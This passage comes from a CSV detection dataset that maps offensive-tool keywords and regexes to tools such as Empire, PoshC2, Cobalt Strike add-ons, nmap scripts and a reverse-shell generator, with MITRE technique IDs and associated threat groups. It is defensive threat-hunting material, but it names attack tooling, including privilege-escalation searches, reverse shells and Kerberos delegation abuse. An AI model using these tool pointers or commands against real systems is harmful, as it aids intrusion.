Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-BypassUAC.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2560"
"* PayloadsDirectory*",".{0,1000}\sPayloadsDirectory.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","2561"
"* payloadtests.py*",".{0,1000}\spayloadtests\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","2562"
"* PayloadType.BIND_TCP*",".{0,1000}\sPayloadType\.BIND_TCP.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","2563"
"* --payload-types all*",".{0,1000}\s\-\-payload\-types\sall.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2564"
"* --payload-types bin*",".{0,1000}\s\-\-payload\-types\sbin.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2565"
"* --payload-types dll*",".{0,1000}\s\-\-payload\-types\sdll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2566"
"* --payload-types exe*",".{0,1000}\s\-\-payload\-types\sexe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2567"
"* --payload-types ps1*",".{0,1000}\s\-\-payload\-types\sps1.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2568"
"* --payload-types py*",".{0,1000}\s\-\-payload\-types\spy.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2569"
"* --payload-types svc.exe*",".{0,1000}\s\-\-payload\-types\ssvc\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2570"
"* --payload-types vbs*",".{0,1000}\s\-\-payload\-types\svbs.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2571"
"* pcanywhere-brute.nse*",".{0,1000}\spcanywhere\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2572"
"* pcworx-info.nse*",".{0,1000}\spcworx\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2576"
"* pdf2john.py*",".{0,1000}\spdf2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2577"
"* -PE_Clone *",".{0,1000}\s\-PE_Clone\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","2578"
"* -pe-exp-list *.dll*",".{0,1000}\s\-pe\-exp\-list\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","2579"
"* -PEPath * -ExeArgs *",".{0,1000}\s\-PEPath\s.{0,1000}\s\-ExeArgs\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-PSInject.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2580"
"* Perform S4U constrained delegation abuse*",".{0,1000}\sPerform\sS4U\sconstrained\sdelegation\sabuse.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","2581"
"* perl-reverse-shell - *",".{0,1000}\sperl\-reverse\-shell\s\-\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","2582"
"* -perm -2000 -o -perm -4000*",".{0,1000}\s\-perm\s\-2000\s\-o\s\-perm\s\-4000.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","2583"
"* -PermanentWMI *",".{0,1000}\s\-PermanentWMI\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 